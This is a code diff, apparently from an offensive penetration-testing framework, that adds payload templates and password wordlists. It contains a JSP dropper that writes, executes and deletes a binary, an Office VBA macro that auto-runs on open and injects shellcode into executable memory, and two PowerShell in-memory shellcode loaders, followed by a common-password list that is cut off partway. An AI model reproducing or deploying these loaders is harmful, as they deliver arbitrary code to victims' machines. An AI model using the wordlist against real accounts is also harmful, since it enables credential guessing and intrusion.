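+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+		
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	} 
+	else 
+	{
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	}
+%%>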

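--- a/data/templates/scripts/to_mem.vba.template
+++ b/data/templates/scripts/to_mem.vba.template
@@ -0,0 +1,32 @@
+#If Vba7 Then
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+	%{bytes}
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+		%{var_myByte} = %{var_myArray}(%{var_offset})
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+	Next %{var_offset}
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+	Auto_Open
+End Sub
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+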

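--- a/data/templates/scripts/to_mem_dotnet.ps1.template
+++ b/data/templates/scripts/to_mem_dotnet.ps1.template
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+%{shellcode}
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)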

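--- a/data/templates/scripts/to_mem_old.ps1.template
+++ b/data/templates/scripts/to_mem_old.ps1.template
@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)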

+ 1024
- 0
data/wordlists/burnett_top_1024.txt


+ 500
- 0
data/wordlists/burnett_top_500.txt View File

@@ -0,0 +1,500 @@
1
+password
2
+123456
3
+12345678
4
+1234
5
+qwerty
6
+12345
7
+dragon
8
+pussy
9
+baseball
10
+football
11
+letmein
12
+monkey
13
+696969
14
+abc123
15
+mustang
16
+michael
17
+shadow
18
+master
19
+jennifer
20
+111111
21
+2000
22
+jordan
23
+superman
24
+harley
25
+1234567
26
+fuckme
27
+hunter
28
+fuckyou
29
+trustno1
30
+ranger
31
+buster
32
+thomas
33
+tigger
34
+robert
35
+soccer
36
+fuck
37
+batman
38
+test
39
+pass
40
+killer
41
+hockey
42
+george
43
+charlie
44
+andrew
45
+michelle
46
+love
47
+sunshine
48
+jessica
49
+asshole
50
+6969
51
+pepper
52
+daniel
53
+access
54
+123456789
55
+654321
56
+joshua
57
+maggie
58
+starwars
59
+silver
60
+william
61
+dallas
62
+yankees
63
+123123
64
+ashley
65
+666666
66
+hello
67
+amanda
68
+orange
69
+biteme
70
+freedom
71
+computer
72
+sexy
73
+thunder
74
+nicole
75
+ginger
76
+heather
77
+hammer
78
+summer
79
+corvette
80
+taylor
81
+fucker
82
+austin
83
+1111
84
+merlin
85
+matthew
86
+121212
87
+golfer
88
+cheese
89
+princess
90
+martin
91
+chelsea
92
+patrick
93
+richard
94
+diamond
95
+yellow
96
+bigdog
97
+secret
98
+asdfgh
99
+sparky
100
+cowboy
101
+camaro
102
+anthony
103
+matrix
104
+falcon
105
+iloveyou
106
+bailey
107
+guitar
108
+jackson
109
+purple
110
+scooter
111
+phoenix
112
+aaaaaa
113
+morgan
114
+tigers
115
+porsche
116
+mickey
117
+maverick
118
+cookie
119
+nascar
120
+peanut
121
+justin
122
+131313
123
+money
124
+horny
125
+samantha
126
+panties
127
+steelers
128
+joseph
129
+snoopy
130
+boomer
131
+whatever
132
+iceman
133
+smokey
134
+gateway
135
+dakota
136
+cowboys
137
+eagles
138
+chicken
139
+dick
140
+black
141
+zxcvbn
142
+please
143
+andrea
144
+ferrari
145
+knight
146
+hardcore
147
+melissa
148
+compaq
149
+coffee
150
+booboo
151
+bitch
152
+johnny
153
+bulldog
154
+xxxxxx
155
+welcome
156
+james
157
+player
158
+ncc1701
159
+wizard
160
+scooby
161
+charles
162
+junior
163
+internet
164
+bigdick
165
+mike
166
+brandy
167
+tennis
168
+blowjob
169
+banana
170
+monster
171
+spider
172
+lakers
173
+miller
174
+rabbit
175
+enter
176
+mercedes
177
+brandon
178
+steven
179
+fender
180
+john
181
+yamaha
182
+diablo
183
+chris
184
+boston
185
+tiger
186
+marine
187
+chicago
188
+rangers
189
+gandalf
190
+winter
191
+bigtits
192
+barney
193
+edward
194
+raiders
195
+porn
196
+badboy
197
+blowme
198
+spanky
199
+bigdaddy
200
+johnson
201
+chester
202
+london
203
+midnight
204
+blue
205
+fishing
206
+000000
207
+hannah
208
+slayer
209
+11111111
210
+rachel
211
+sexsex
212
+redsox
213
+thx1138
214
+asdf
215
+marlboro
216
+panther
217
+zxcvbnm
218
+arsenal
219
+oliver
220
+qazwsx
221
+mother
222
+victoria
223
+7777777
224
+jasper
225
+angel
226
+david
227
+winner
228
+crystal
229
+golden
230
+butthead
231
+viking
232
+jack
233
+iwantu
234
+shannon
235
+murphy
236
+angels
237
+prince
238
+cameron
239
+girls
240
+madison
241
+wilson
242
+carlos
243
+hooters
244
+willie
245
+startrek
246
+captain
247
+maddog
248
+jasmine
249
+butter
250
+booger
251
+angela
252
+golf
253
+lauren
254
+rocket
255
+tiffany
256
+theman
257
+dennis
258
+liverpoo
259
+flower
260
+forever
261
+green
262
+jackie
263
+muffin
264
+turtle
265
+sophie
266
+danielle
267
+redskins
268
+toyota
269
+jason
270
+sierra
271
+winston
272
+debbie
273
+giants
274
+packers
275
+newyork
276
+jeremy
277
+casper
278
+bubba
279
+112233
280
+sandra
281
+lovers
282
+mountain
283
+united
284
+cooper
285
+driver
286
+tucker
287
+helpme
288
+fucking
289
+pookie
290
+lucky
291
+maxwell
292
+8675309
293
+bear
294
+suckit
295
+gators
296
+5150
297
+222222
298
+shithead
299
+fuckoff
300
+jaguar
301
+monica
302
+fred
303
+happy
304
+hotdog
305
+tits
306
+gemini
307
+lover
308
+xxxxxxxx
309
+777777
310
+canada
311
+nathan
312
+victor
313
+florida
314
+88888888
315
+nicholas
316
+rosebud
317
+metallic
318
+doctor
319
+trouble
320
+success
321
+stupid
322
+tomcat
323
+warrior
324
+peaches
325
+apples
326
+fish
327
+qwertyui
328
+magic
329
+buddy
330
+dolphins
331
+rainbow
332
+gunner
333
+987654
334
+freddy
335
+alexis
336
+braves
337
+cock
338
+2112
339
+1212
340
+cocacola
341
+xavier
342
+dolphin
343
+testing
344
+bond007
345
+member
346
+calvin
347
+voodoo
348
+7777
349
+samson
350
+alex
351
+apollo
352
+fire
353
+tester
354
+walter
355
+beavis
356
+voyager
357
+peter
358
+porno
359
+bonnie
360
+rush2112
361
+beer
362
+apple
363
+scorpio
364
+jonathan
365
+skippy
366
+sydney
367
+scott
368
+red123
369
+power
370
+gordon
371
+travis
372
+beaver
373
+star
374
+jackass
375
+flyers
376
+boobs
377
+232323
378
+zzzzzz
379
+steve
380
+rebecca
381
+scorpion
382
+doggie
383
+legend
384
+ou812
385
+yankee
386
+blazer
387
+bill
388
+runner
389
+birdie
390
+bitches
391
+555555
392
+parker
393
+topgun
394
+asdfasdf
395
+heaven
396
+viper
397
+animal
398
+2222
399
+bigboy
400
+4444
401
+arthur
402
+baby
403
+private
404
+godzilla
405
+donald
406
+williams
407
+lifehack
408
+phantom
409
+dave
410
+rock
411
+august
412
+sammy
413
+cool
414
+brian
415
+platinum
416
+jake
417
+bronco
418
+paul
419
+mark
420
+frank
421
+heka6w2
422
+copper
423
+billy
424
+cumshot
425
+garfield
426
+willow
427
+cunt
428
+little
429
+carter
430
+slut
431
+albert
432
+69696969
433
+kitten
434
+super
435
+jordan23
436
+eagle1
437
+shelby
438
+america
439
+11111
440
+jessie
441
+house
442
+free
443
+123321
444
+chevy
445
+bullshit
446
+white
447
+broncos
448
+horney
449
+surfer
450
+nissan
451
+999999
452
+saturn
453
+airborne
454
+elephant
455
+marvin
456
+shit
457
+action
458
+adidas
459
+qwert
460
+kevin
461
+1313
462
+explorer
463
+walker
464
+police
465
+christin
466
+december
467
+benjamin
468
+wolf
469
+sweet
470
+therock
471
+king
472
+online
473
+dickhead
474
+brooklyn
475
+teresa
476
+cricket
477
+sharon
478
+dexter
479
+racing
480
+penis
481
+gregory
482
+0000
483
+teens
484
+redwings
485
+dreams
486
+michigan
487
+hentai
488
+magnum
489
+87654321
490
+nothing
491
+donkey
492
+trinity
493
+digital
494
+3